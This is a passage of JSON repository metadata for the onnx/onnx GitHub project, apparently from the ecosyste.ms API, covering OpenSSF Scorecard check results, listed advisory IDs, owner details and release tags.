epositories/onnx%2Fonnx/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/onnx","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/sbom","scorecard":{"id":245425,"data":{"date":"2025-08-16T10:32:36Z","repo":{"name":"github.com/onnx/onnx","commit":"3e8c39a7c90f06e3a5ea9561c72770649dcb1b4f"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":6.9,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: Dependabot: .github/dependabot.yml:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Dangerous-Workflow","score":0,"reason":"dangerous workflow patterns detected","details":["Warn: untrusted code checkout '${{ github.event.pull_request.head.sha }}': .github/workflows/auto_update_doc.yml:25"],"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":9,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/auto_update_doc.yml:22","Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:35","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:36","Info: jobLevel 'contents' permission set to 'read': .github/workflows/copilot-setup-steps.yml:26","Info: jobLevel 'contents' permission set to 'read': .github/workflows/create_release.yml:214","Info: jobLevel 'contents' permission set to 'read': .github/workflows/create_release.yml:266","Info: jobLevel 'contents' permission set to 'read': .github/workflows/create_release.yml:304","Info: jobLevel 'contents' permission set to 'read': .github/workflows/create_release.yml:162","Info: jobLevel 'contents' permission set to 'read': .github/workflows/pr_checks.yml:24","Info: topLevel 'contents' permission set to 'read': .github/workflows/auto_update_doc.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/check_urls.yml:16","Info: topLevel 'contents' permission set to 'read': .github/workflows/clang_tidy_review.yml:16","Warn: topLevel 'checks' permission set to 'write': .github/workflows/clang_tidy_review_post.yml:16","Info: topLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:24","Info: topLevel 'contents' permission set to 'read': .github/workflows/copilot-setup-steps.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/create_release.yml:62","Info: topLevel 'contents' permission set to 'read': .github/workflows/dco_merge_group.yml:10","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/pages.yml:18","Info: topLevel 'contents' permission set to 'read': .github/workflows/pixi_build.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/pr_checks.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/preview_source_dist_test.yml:23","Info: topLevel 'contents' permission set to 'read': .github/workflows/release_linux.yml:18","Info: topLevel 'contents' permission set to 'read': .github/workflows/release_mac.yml:23","Info: topLevel 'contents' permission set to 'read': .github/workflows/release_sdist.yml:18","Info: topLevel 'contents' permission set to 'read': .github/workflows/release_win_aarch64.yml:18","Info: topLevel 'contents' permission set to 'read': .github/workflows/release_win_x86_64.yml:18","Info: topLevel 'contents' permission set to 'read': .github/workflows/reuse.yml:10","Info: topLevel permissions set to 'read-all': .github/workflows/scorecard.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/stale.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/weekly_modelzoo.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/win_no_exception_ci.yml:14"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"CII-Best-Practices","score":5,"reason":"badge detected: Passing","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"Pinned-Dependencies","score":3,"reason":"dependency not pinned by hash detected -- score normalized to 3","details":["Info: Possibly incomplete results: error parsing shell code: statements must be separated by \u0026, ; or a newline: .github/workflows/main.yml:131","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/copilot-setup-steps.yml:32: update your workflow using https://app.stepsecurity.io/secureworkflow/onnx/onnx/copilot-setup-steps.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/main.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/onnx/onnx/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pixi_build.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/onnx/onnx/pixi_build.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pixi_build.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/onnx/onnx/pixi_build.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr_checks.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/onnx/onnx/pr_checks.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release_linux.yml:52: update your workflow using https://app.stepsecurity.io/secureworkflow/onnx/onnx/release_linux.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release_linux.yml:60: update your workflow using https://app.stepsecurity.io/secureworkflow/onnx/onnx/release_linux.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/auto_update_doc.yml:41","Warn: pipCommand not pinned by hash: .github/workflows/auto_update_doc.yml:42","Warn: pipCommand not pinned by hash: .github/workflows/auto_update_doc.yml:45","Warn: pipCommand not pinned by hash: .github/workflows/codeql.yml:59","Warn: pipCommand not pinned by hash: .github/workflows/codeql.yml:78","Warn: pipCommand not pinned by hash: .github/workflows/codeql.yml:81","Warn: pipCommand not pinned by hash: .github/workflows/copilot-setup-steps.yml:39","Warn: pipCommand not pinned by hash: .github/workflows/copilot-setup-steps.yml:40","Warn: pipCommand not pinned by hash: .github/workflows/copilot-setup-steps.yml:41","Warn: pipCommand not pinned by hash: .github/workflows/lint.yml:73","Warn: pipCommand not pinned by hash: .github/workflows/lint.yml:80","Warn: pipCommand not pinned by hash: .github/workflows/lint.yml:83","Warn: pipCommand not pinned by hash: .github/workflows/lint.yml:85","Warn: pipCommand not pinned by hash: .github/workflows/lint.yml:86","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:151","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:161","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:171","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:189","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:195","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:249","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:266","Warn: pipCommand not pinned by hash: .github/workflows/pages.yml:36","Warn: pipCommand not pinned by hash: .github/workflows/pages.yml:37","Warn: pipCommand not pinned by hash: .github/workflows/pages.yml:38","Warn: pipCommand not pinned by hash: .github/workflows/pages.yml:47","Warn: pipCommand not pinned by hash: .github/workflows/pr_checks.yml:36","Warn: pipCommand not pinned by hash: .github/workflows/preview_source_dist_test.yml:47","Warn: pipCommand not pinned by hash: .github/workflows/preview_source_dist_test.yml:48","Warn: pipCommand not pinned by hash: .github/workflows/preview_source_dist_test.yml:49","Warn: pipCommand not pinned by hash: .github/workflows/preview_source_dist_test.yml:50","Warn: pipCommand not pinned by hash: .github/workflows/preview_source_dist_test.yml:57","Warn: pipCommand not pinned by hash: .github/workflows/preview_source_dist_test.yml:58","Warn: pipCommand not pinned by hash: .github/workflows/preview_source_dist_test.yml:59","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:81","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:82","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:93","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:112","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:113","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:119","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:120","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:126","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:127","Warn: pipCommand not pinned by hash: .github/workflows/release_mac.yml:47","Warn: pipCommand not pinned by hash: .github/workflows/release_mac.yml:48","Warn: pipCommand not pinned by hash: .github/workflows/release_sdist.yml:45","Warn: pipCommand not pinned by hash: .github/workflows/release_sdist.yml:46","Warn: pipCommand not pinned by hash: .github/workflows/weekly_modelzoo.yml:42","Warn: pipCommand not pinned by hash: .github/workflows/weekly_modelzoo.yml:43","Warn: pipCommand not pinned by hash: .github/workflows/weekly_modelzoo.yml:55","Info:  59 out of  61 GitHub-owned GitHubAction dependencies pinned","Info:  22 out of  27 third-party GitHubAction dependencies pinned","Info:   0 out of  49 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: Apache License 2.0: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/create_release.yml:152"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"SAST","score":10,"reason":"SAST tool is run on all commits","details":["Info: SAST configuration detected: CodeQL","Info: all commits (30) are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":0,"reason":"74 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-6rq9-53c3-f7vj","Warn: Project is vulnerable to: PYSEC-2023-38 / GHSA-ffxj-547x-5j7c","Warn: Project is vulnerable to: PYSEC-2025-10 / GHSA-h36j-8vv3-cj52","Warn: Project is vulnerable to: PYSEC-2024-223 / GHSA-h8wv-9h96-m4hr","Warn: Project is vulnerable to: PYSEC-2024-222 / GHSA-whh8-fjgc-qp73","Warn: Project is vulnerable to: GHSA-3c5c-7235-994j","Warn: Project is vulnerable to: GHSA-3f63-hfp8-52jq","Warn: Project is vulnerable to: PYSEC-2021-41 / GHSA-3wvg-mj6g-m9cv","Warn: Project is vulnerable to: PYSEC-2020-77 / GHSA-3xv8-3j54-hgrp","Warn: Project is vulnerable to: PYSEC-2020-80 / GHSA-43fq-w8qq-v88h","Warn: Project is vulnerable to: GHSA-44wm-f244-xhp3","Warn: Project is vulnerable to: GHSA-4fx9-vc88-q2xc","Warn: Project is vulnerable to: PYSEC-2021-35 / GHSA-57h3-9rgr-c24m","Warn: Project is vulnerable to: PYSEC-2020-172 / GHSA-5gm3-px64-rw72","Warn: Project is vulnerable to: PYSEC-2021-331 / GHSA-7534-mm45-c74v","Warn: Project is vulnerable to: PYSEC-2021-92 / GHSA-7r7m-5h27-29hp","Warn: Project is vulnerable to: PYSEC-2020-78 / GHSA-8843-m7mw-mxqm","Warn: Project is vulnerable to: PYSEC-2023-227 / GHSA-8ghj-p4vj-mr35","Warn: Project is vulnerable to: PYSEC-2014-87 / GHSA-8m9x-pxwq-j236","Warn: Project is vulnerable to: PYSEC-2022-10 / GHSA-8vj2-vxx3-667w","Warn: Project is vulnerable to: PYSEC-2021-36 / GHSA-8xjq-8fcg-g5hw","Warn: Project is vulnerable to: PYSEC-2016-6 / GHSA-8xjv-v9xq-m5h9","Warn: Project is vulnerable to: PYSEC-2021-42 / GHSA-95q3-8gr9-gm8w","Warn: Project is vulnerable to: PYSEC-2022-168 / GHSA-9j59-75qj-795w","Warn: Project is vulnerable to: PYSEC-2014-10 / GHSA-cfmr-38g9-f2h7","Warn: Project is vulnerable to: PYSEC-2020-76 / GHSA-cqhg-xjhh-p8hf","Warn: Project is vulnerable to: PYSEC-2021-40 / GHSA-f4w8-cv6p-x6r5","Warn: Project is vulnerable to: PYSEC-2021-69 / GHSA-f5g8-5qq7-938w","Warn: Project is vulnerable to: PYSEC-2021-139 / GHSA-g6rj-rv7j-xwp4","Warn: Project is vulnerable to: PYSEC-2015-16 / GHSA-h5rf-vgqx-wjv2","Warn: Project is vulnerable to: PYSEC-2016-5 / GHSA-hggx-3h72-49ww","Warn: Project is vulnerable to: PYSEC-2020-84 / GHSA-hj69-c76v-86wr","Warn: Project is vulnerable to: PYSEC-2016-7 / GHSA-hvr8-466p-75rh","Warn: Project is vulnerable to: PYSEC-2015-15 / GHSA-j6f7-g425-4gmx","Warn: Project is vulnerable to: GHSA-j7hp-h8jx-5ppr","Warn: Project is vulnerable to: PYSEC-2019-110 / GHSA-j7mj-748x-7p78","Warn: Project is vulnerable to: GHSA-jgpv-4h4c-xhw3","Warn: Project is vulnerable to: PYSEC-2022-42979 / GHSA-m2vv-5vj5-2hm7","Warn: Project is vulnerable to: PYSEC-2021-37 / GHSA-mvg9-xffr-p774","Warn: Project is vulnerable to: PYSEC-2020-83 / GHSA-p49h-hjvm-jg3h","Warn: Project is vulnerable to: PYSEC-2022-8 / GHSA-pw3c-h7wp-cvhx","Warn: Project is vulnerable to: PYSEC-2021-93 / GHSA-q5hq-fp76-qmrc","Warn: Project is vulnerable to: PYSEC-2020-82 / GHSA-r7rm-8j6h-r933","Warn: Project is vulnerable to: PYSEC-2014-23 / GHSA-r854-96gq-rfg3","Warn: Project is vulnerable to: PYSEC-2016-8 / GHSA-rwr3-c2q8-gm56","Warn: Project is vulnerable to: PYSEC-2020-81 / GHSA-vcqg-3p29-xw73","Warn: Project is vulnerable to: PYSEC-2020-79 / GHSA-vj42-xq3r-hr3r","Warn: Project is vulnerable to: PYSEC-2021-70 / GHSA-vqcj-wrf2-7v73","Warn: Project is vulnerable to: PYSEC-2016-9 / GHSA-w4vg-rf63-f3j3","Warn: Project is vulnerable to: PYSEC-2014-22 / GHSA-x895-2wrm-hvp7","Warn: Project is vulnerable to: PYSEC-2022-9 / GHSA-xrcv-f9gm-v42c","Warn: Project is vulnerable to: PYSEC-2021-137","Warn: Project is vulnerable to: PYSEC-2021-138","Warn: Project is vulnerable to: PYSEC-2021-317","Warn: Project is vulnerable to: PYSEC-2021-38","Warn: Project is vulnerable to: PYSEC-2021-39","Warn: Project is vulnerable to: PYSEC-2021-94","Warn: Project is vulnerable to: PYSEC-2023-175","Warn: Project is vulnerable to: PYSEC-2018-34 / GHSA-2fc2-6r4j-p65h","Warn: Project is vulnerable to: PYSEC-2021-856 / GHSA-5545-2q6w-2gh6","Warn: Project is vulnerable to: PYSEC-2019-108 / GHSA-9fq2-x9r6-wfmf","Warn: Project is vulnerable to: PYSEC-2018-33 / GHSA-cw6w-4rcx-xphc","Warn: Project is vulnerable to: PYSEC-2021-857 / GHSA-f7c7-j99h-c22f","Warn: Project is vulnerable to: GHSA-fpfv-jqm9-f5jm","Warn: Project is vulnerable to: PYSEC-2017-1 / GHSA-frgw-fgh6-9g52","Warn: Project is vulnerable to: PYSEC-2022-48 / GHSA-77rm-9x9h-xj3g","Warn: Project is vulnerable to: GHSA-8gq9-2x98-w8hf","Warn: Project is vulnerable to: GHSA-8qvm-5x2c-j2w7","Warn: Project is vulnerable to: PYSEC-2017-65 / GHSA-jwvw-v7c5-m82h","Warn: Project is vulnerable to: PYSEC-2013-22 / GHSA-27x4-j476-jp5f","Warn: Project is vulnerable to: PYSEC-2025-49 / GHSA-5rjg-fvgr-3xxf","Warn: Project is vulnerable to: GHSA-cx63-2mw6-8hw5","Warn: Project is vulnerable to: PYSEC-2022-43012 / GHSA-r9hx-vwmv-q579","Warn: Project is vulnerable to: PYSEC-2022-43017 / GHSA-qwmp-2cf2-g9g6"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}},{"name":"CI-Tests","score":10,"reason":"30 out of 30 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 30 contributing companies or organizations","details":["Info: found contributions from: EasyRPG, PeachPy, ScottyLabs, ZhaobangChina, amd, anthropics, barnowl, chainer, couler-proj, cpprefjp, cryfs, cupy, dotnet, facebook, ghc, gsoc-cn, intelligent-machine-learning, k9mail, microsoft, microsoft research, mrbgems, nanyang technological university, nvidia, onnx, open-keychain, pytorch, sipb, skywork ai, sql-machine-learning, uc berkeley"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}}]},"last_synced_at":"2025-08-17T07:32:27.176Z","repository_id":24890799,"created_at":"2025-08-17T07:32:27.176Z","updated_at":"2025-08-17T07:32:27.176Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":281322869,"owners_count":26481547,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-27T02:00:05.855Z","response_time":61,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"onnx","name":"Open Neural Network Exchange","uuid":"31675368","kind":"organization","description":"ONNX is an open ecosystem for interoperable AI models. It's a community project: we welcome your contributions!","email":null,"website":"https://onnx.ai","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/31675368?v=4","repositories_count":25,"last_synced_at":"2024-04-18T02:52:20.873Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/onnx","funding_links":[],"total_stars":37281,"followers":1377,"following":0,"created_at":"2022-11-02T16:24:54.756Z","updated_at":"2024-04-18T02:52:25.131Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/onnx","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/onnx/repositories"},"tags":[{"name":"v1.19.1","sha":"b751946c3d59a3c8358abcc0569b59e6ddb08cdd","kind":"commit","published_at":"2025-10-08T03:53:00.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.19.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"57b9c6a4f6eebb09ae1b34cfb632078518f72832","kind":"commit","published_at":"2025-08-26T21:37:09.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.19.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.19.0/manifests"},{"name":"v1.18.0","sha":"e709452ef2bbc1d113faf678c24e6d3467696e83","kind":"commit","published_at":"2025-05-08T17:33:57.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.18.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.18.0/manifests"},{"name":"v1.17.0","sha":"b8baa8446686496da4cc8fda09f2b6fe65c2a02c","kind":"commit","published_at":"2024-09-30T22:42:05.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.17.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.17.0/manifests"},{"name":"v1.16.2","sha":"3bf92c03a9f27eba3bda1e5b9e63ea20ec213557","kind":"commit","published_at":"2024-07-31T13:15:06.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.16.2","html_url":"https://github.com/onnx/onnx/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"595228d99e3977ac27cb79d5963adda262af99ad","kind":"commit","published_at":"2024-05-23T16:33:07.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.16.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"990217f043af7222348ca8f0301e17fa7b841781","kind":"commit","published_at":"2024-03-25T13:55:50.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.16.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.16.0/manifests"},{"name":"v1.15.0","sha":"b86cc54efce19530fb953e4b21f57e6b3888534c","kind":"commit","published_at":"2023-10-25T22:10:41.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.15.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.15.0/manifests"},{"name":"v1.14.1","sha":"1014f41f17ecc778d63e760a994579d96ba471ff","kind":"commit","published_at":"2023-08-24T22:20:34.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.14.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"a0d77f18516d2da7468a96b0de3b737266f23176","kind":"commit","published_at":"2023-05-04T00:14:24.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.14.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.14.0/manifests"},{"name":"v1.13.1","sha":"ad834eb73ee0cd9b6fa9ea892caeed5fa17d7dc0","kind":"commit","published_at":"2023-02-21T22:21:30.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.13.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"1ba785612a79fe749aa1e478336e534743372639","kind":"commit","published_at":"2022-12-09T18:56:29.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.13.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.13.0/manifests"},{"name":"v1.12.0","sha":"f7ee1ac60d06abe8e26c9b6bbe1e3db5286b614b","kind":"commit","published_at":"2022-06-17T23:32:07.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.12.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/